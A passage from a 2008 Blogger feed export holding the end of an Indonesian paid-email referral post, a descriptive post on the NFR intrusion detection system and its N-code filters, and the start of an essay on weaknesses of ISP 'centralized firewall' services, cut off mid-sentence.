check&lt;/em&gt; yang bisa Anda cairkan di banyak bank di Indonesia. dibawah ini ada beberapa link yang sudah terbukti membayar :&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;  &lt;p&gt;&lt;a href="http://www.getpaidmail.com/pages/index.php?refid=pirates"&gt;&lt;img alt="getpaidmail.com" src="http://www.getpaidmail.com/images/banner5.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.no-minimum.com/pages/index.php?refid=darmatkj"&gt;&lt;img alt="no-minimum.com" src="http://www.no-minimum.com/banners/nomin2.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;   &lt;p&gt;&lt;a href="http://www.sendmoreinfo.com/Id/3105647"&gt;&lt;img src="http://www.sendmoreinfo.com/members/Banner01.gif" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://www.sendmoreinfo.com/Id/3105647"&gt;Earn Some money here&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-6437145206992561494?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/6437145206992561494/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=6437145206992561494' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6437145206992561494'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6437145206992561494'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/look-for-money-without-capitalmany.html' title=''/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-2347529749217098407</id><published>2008-03-25T12:05:00.000-07:00</published><updated>2008-03-25T12:07:07.033-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Network Flight Recorder – A New Tool for the War</title><content type='html'>&lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR (Network Flight Recorder available at &lt;a href="http://www.nfr.net/"&gt;http://www.nfr.net&lt;/a&gt;) is an IDS (Intrusion Detection System) that gives the users a powerful tool for the war against illegal access to your network. With the flexibility of this tool, network managers can feel a little better about who is accessing their network and where their employees are going.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;How Does NFR Work? Features of NFR&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The NFR Intrusion Detection Appliance (IDA) is a flexible, extensible, general-purpose tool that addresses both security and network management. NFR uses N-Code that was released to allow the users the flexibility to configure the IDA for their configuration. NFR is a programmable traffic analysis/intrusion detection engine that can be instantly updated when a new attack is discovered. Most IDS like ISS RealSecure or Axent’s Intruder Alert/NetProwler require that the vendor send out either an executable from ISS or a signature from Axent. With NFR a user can write their own request order and install it. NFR gives the users a chance to customize the IDA to their needs. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The architecture of NFR was designed as a set of components, each tailored to a specific activity. Data is gathered by one or more packet suckers, forwarded to the decision engine for filtering and reassembly, and possibly recorded to a backend for storage or statistical processing. The query interface is kept completely separate from the input data flow to minimize the performance impact&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Of a users querying the system while it is collecting data. The N programming language is a derivation of an interpreted language designed years ago for use in a computer game. The interpreter operates on a byte-code instruction set that implements a simple stack machine. One advantage of this approach is that NFR filters occupy very little memory, yet are quite fast to evaluate. N is a complete programming language including flow control, procedures, variables with scoping rules, and list data types. Unlike many programming languages, however, N has primary data types such as "IP address." Since NFR's may be used on large networks, we chose to implement counter data types as 64-bit integers, to reduce the chance of overflow&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Configurations:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR can be configured in both distributed and stand-alone configurations. In the stand-alone configuration, a single NFR station gathers and stores information. The distributed configuration places multiple remote stations on the network, and each rolls their data to a central station. Manage, query, and view alerts through the central station and as you network grows, you add a new remote for that segment. You can manage your IDA from any Windows machine on your network. Change system settings, run queries, or view and receive alerts from the location the convenient for you. &lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;How Can You Monitor Your System? &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR has alerts that can be configured to popup on the NFR Console. The alerts popup and make a beep on the console which require immediate attention. The alerts are sent to the NFR console and the NFR IDA Recorder. If you are not running the console, you can use the alert viewer to view the alerts at a later time. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Triggers within N-code occur upon receipt or detection of an event that the code is attached to. Events can be triggered with limitations on source, destination, ports, client or server side (if known), or patterns within the TCP stream. The syntax looks like:&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;filter mailtrack tcp (client, dport: 25 ) { &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The filter above is a simple TCP stream trigger that will monitor the client side of SMTP connections. The "client" and "server" notion is based on the reassembly engines recollection of which system initiated the connection that is being observed.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Keywords that can be placed within an event are:&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;client - from the caller &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;server - from the called &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;start: "string" - begin matching &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;stop: "string" - end matching &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;opensession - on start of connection &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;closesession - on end of connection &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;port - IP port number (source or dest) &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;sport - source port &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;dport - destination port &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;host - source or destination address &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;net - source or destination network &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;dst - destination address &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;src - source address &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;A typical use is to configure an event to call N code for as small a subset of received data as is practical, then implement any further filtering in N code. To detect spam, for example, you might select TCP traffic for port 25/SMTP.&lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Components:&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;NFR uses an IDA engine to sniff packets from one or more interfaces on the NFR IDA. Unlike a firewall, NFR IDA engine does not actually touch the packet. It only observes them to be recorded. Events tell the NFR IDA engine to take some sort of action. Events can be a command and control message, passage of time, and an arrival of a packet. Backends is one of the components of the IDA. Within Backends, you will have Filters, which list the event that caused the NFR IDA engine to begin gathering data. Configuration Files provide information about the title of the backend and other information displayed via the NFR console. Recorders write the information gathered by the backends to files. List Recorders collects, records, and maintain a log of activity. Histogram Recorders collects statistical information in many dimensions, rather than the one dimension typically used when gathering statistics. Packages group related types of Backends together. Shared N-Code filters that perform some of the processing for the backends in the package. Configuration files provide information about the title of the package and other information displayed via the NFR console.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;"Centralized firewall" problems&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;DISCLAIMER: This document contains untested ideas, please verify or debunk &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;me. Perhaps this is already old information? In any case, I would&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;like some (constructive) feedback.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Introduction&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Many Internet Service Providers (ISPs) provide so-called "centralized &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;firewall" services to leased line customers. This document is an attempt to&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;highlight problems which may be associated with such a service. Bear in&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;mind that the ideas have not been tested (yet).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;So, what is a centralized firewall service? And what is the idea behind such&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;a service? Well, let's talk about the idea first. The "easy" way to add&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;security to a network is to place a firewall between the network to be&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;protected and the open one (the Internet). The problem with this solution&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is that someone has to spend time watching logs, maintaining rules, apply any &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;patches, and keep the firewall software up-to-date. This costs a lot of time, &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;and in most cases, a lot of money (security professionals are usually not &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;cheap these days).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;ISPs know this. They also know that it is unlikely that small and medium-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;sized businesses (SMBs) have the time, money or expertise to invest in such&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;a position. The solution they sell to SMBs is the centralized firewall.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The centralized firewall leaves all the log-watching and maintenance to the &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;ISP, and the ISP provides some sort of report if there is an attack, and &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;usually some sort of weekly or monthly summary (SMB executives like to know&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;how "visible" they are on the 'net).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Service types&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;-------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;I know of three types of ISP "firewall" services. One of them is not&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;centralized, so will not be covered here (remote maintenance, where there's a&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;physical firewall at the customer's site, owned and maintained by the ISP).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The two other types are based on a "real" firewall (such as Firewall-1) or&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;by using access-control lists (ACLs). The two figures below outline the &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;(usual) configuration for both solutions. Figure 1 describes the solution &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;using a true firewall, and figure 2 a solution using access-lists. The two&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;solutions usually reflect the price of the service. Leased-line customers&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;usually have the benefit of a "true" firewall, while dial-up customers are&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;given the ACL option.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;{Internet}&lt;span style=""&gt;    &lt;/span&gt;(5)&lt;span style=""&gt;                       &lt;/span&gt;{Internet}&lt;span style=""&gt;     &lt;/span&gt;(3)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                &lt;/span&gt;|&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;                           &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;+-------------+&lt;span style=""&gt;                         &lt;/span&gt;+---------------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;| Core router |&lt;span style=""&gt;  &lt;/span&gt;(4)&lt;span style=""&gt;                    &lt;/span&gt;| Access Router | (2)&lt;span style=""&gt;       &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;+-------------+&lt;span style=""&gt;                         &lt;/span&gt;| w/ ACL&lt;span style=""&gt;        &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;&lt;span style=""&gt; &lt;/span&gt;|&lt;span style=""&gt;                                &lt;/span&gt;+---------------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;+-------+&lt;span style=""&gt;                             &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;  &lt;/span&gt;ISDN lines&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;| Fire- |&lt;span style=""&gt;   &lt;/span&gt;(3)&lt;span style=""&gt;                       &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;| wall&lt;span style=""&gt;  &lt;/span&gt;|&lt;span style=""&gt;                         &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;|&lt;span style=""&gt;   &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;+-------+&lt;span style=""&gt;                         &lt;/span&gt;| Cust |&lt;span style=""&gt;   &lt;/span&gt;|&lt;span style=""&gt;   &lt;/span&gt;| Cust | ...&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                &lt;/span&gt;|&lt;span style=""&gt;                             &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;|&lt;span style=""&gt;   &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;+--------+&lt;span style=""&gt;                                    &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;| Access |&lt;span style=""&gt;   &lt;/span&gt;(2)&lt;span style=""&gt;              &lt;/span&gt;&lt;span style=""&gt;             &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;| Router |&lt;span style=""&gt;                                 &lt;/span&gt;| Cust | (1)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;+--------+&lt;span style=""&gt;                                 &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;          &lt;/span&gt;/&lt;span style=""&gt;     &lt;/span&gt;|&lt;span style=""&gt;    &lt;/span&gt;\&lt;span style=""&gt;  &lt;/span&gt;Leased Lines&lt;span style=""&gt;               &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;/&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;     &lt;/span&gt;\&lt;span style=""&gt;                      &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;+------+ +------+ +------+&lt;span style=""&gt;                  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;| Cust | | Cust | | Cust | ...&lt;span style=""&gt;  &lt;/span&gt;(1)&lt;span style=""&gt;               &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;| Rtr&lt;span style=""&gt;  &lt;/span&gt;| | Rtr&lt;span style=""&gt;  &lt;/span&gt;| | Rtr&lt;span style=""&gt;  &lt;/span&gt;|&lt;span style=""&gt;                     &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;+------+ +------+ +------+&lt;span style=""&gt;                &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;             &lt;/span&gt;Figure 1&lt;span style=""&gt;                                 &lt;/span&gt;Figure 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;As you can see, there is a great deal more hardware involved when involving&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;a firewall than just relying on ACL's on the access router (hence the &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;difference in price). Both setups, however, have the same basic functions. In&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;figure 1, the traffic is only allowed to travel in the following manner:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;(1) -&gt; (2) -&gt; (3) -&gt; (4)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Policy routing ensures that traffic going from the customer _has_ to pass &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;through the firewall, thus prohibiting inter-customer traffic at level 2.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;In figure 2, one uses "reflexive access-lists" (RACL, introduced in Cisco IOS 